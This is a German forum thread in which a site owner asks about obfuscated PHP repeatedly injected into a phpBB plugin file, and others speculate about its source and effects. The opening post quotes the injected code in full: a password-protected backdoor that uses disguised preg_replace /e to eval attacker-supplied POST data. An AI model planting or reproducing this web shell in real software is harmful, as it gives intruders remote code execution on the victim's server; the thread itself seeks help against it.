Kann mir das jemand erklären ?

    Irgendwelche Dreckschweine setzen mir auf auf bestimmten Seiten einen solchen Code
    ganz oben in den Quelltext.

    PHP
    <?php
if(isset($_POST['pas']) && (md5($_POST['pas']) == '40083ed0f6a4ce'.'5ebfbb49c7b7fcf37b') && isset($_POST['update'])) {$domainValidator='p'.'reg_rep'.'lace';$domain="/.*/e";$domainValidator($domain,'ev'.'al(\\$_POST[\'upd'.'ate\']);', "");}

    Obwohl ich mein FTP-Passwort geändert habe passiert das immer mal wieder.
    Was ist denn daß für ein Mistcode ? - weil die Seite funktioniert dann nicht mehr ... :P
    Was habe ich für Möglichkeiten dieses zu unterbinden ?

    Na ja, da muß ich mal schauen. Ich verstehe nur nicht was das für einen Sinn macht.
    es sind eh nur private Seiten, dann kann das nur jemand sein der mich hasst ... :)
    Aber da gibt es leider sehr viele davon ... :cry:

    Die Dateien waren ja nicht umschrieben, der Code wurde zusätzlich ganz oben eingefügt.
    Einen Verdacht hätte ich, aber das muß ich erstmal testen. Da kann ich auch nichts sagen jetzt.
    Wir werden sehen, der letzte Code war übrigens in meinem Forum, auf der Registrierseite.
    ( phpbb_captcha_qa_plugin.php ) - dort stand er drinn.
    Ich habe das erst gemerkt als ich da mal drauf gegangen bin. Aber wer will mein Pipiforum
    wo eh keiner hingeht schädigen ? Nur ein Mistkerl der mich nicht mag ... :pfeif:

    Die Forenversion wir immer auf dem aktuellen Stand gehalten, da achte ich schon drauf.
    Ich glaube nicht mal das es unbedingt mit dem Forum zu tun hat, denn dieser Code wurde
    auch auf einem anderen Script eingeschleust. Ich denke mal das ich dieses Problem erst habe,
    seitdem ich mal ein neues kostenloses Template für eine unwichtige Seite installiert habe.
    Denn von diesem template wurde auf alle meinen anderen Seiten verlinkt.
    Dieses Template habe ich nun entfernt - mal schauen ob es daran lag.

    Und wenn nicht, dann wird alles nach und nach gelöscht ... :yes: - dann hab ich Ruhe.

    Die machen sich nicht die Arbeit und suchen sich spezielle Seiten raus. Das wird einfach nach den Foren gesucht und fertig. Egal ob das eine große Seite ist oder eine kleine, der Code kommt rein, weil es das entsprechende Forum ist.

    Wenn ein Mensch nicht um dich kämpft, hat er nur gewartet, dass du gehst. ;(

    Jou, Danke Euch - ich hab mal was versucht, wenn das nichts nutzt, dann gibt es Input ... :)
    Werde mich dann wieder melden. Alles möchte ich auch nicht sagen, wer weiß - Feind hört mit ... :hihi:

    Allerdings muss man auch sagen, dass Du damit nicht alleine bist. Bei Dir ist es ein Forum, sagtest Du. Bei anderen ist es in WP (functions.php) eingeschleust worden. Mich stutzt hier jedoch besonders, dass der Code nur bei einem bestimmten Passwort ausgeführt wird und dann auch nur, wenn irgendwas mit "Update" am laufen ist.

    Dass es bei Dir zu einem Fehler kommt hat einen anderen Grund. Bei einigen anderen kam ein Header-Fehler.

    Wenn ein Mensch nicht um dich kämpft, hat er nur gewartet, dass du gehst. ;(

    Ja welcher ist eine andere Frage und lässt sich so nicht klären. Ist aber eine Folge des Codes und nicht des Codes selbst. Ist quasi "nur ein Folgefehler". Z.B. bei den anderen in WP. Da wird durch den Code eine Ausgabe ausgelöst, worauf WP dann einen Fehler meldet, da schon eine Ausgabe stattgefunden hat. Bei Dir kann es das auch sein, kann aber auch ein Fehler im Code sein, nicht unterstützte Funktionen etc. Ist aber eigentlich egal, denn ohne den Code gibt es auch den Fehler nicht.

    Die Frage ist hier also immer noch, wo der Code her kommt und was er genau tut. Insbesondere, was bei "Update" gesetzt wird.

    Wenn ein Mensch nicht um dich kämpft, hat er nur gewartet, dass du gehst. ;(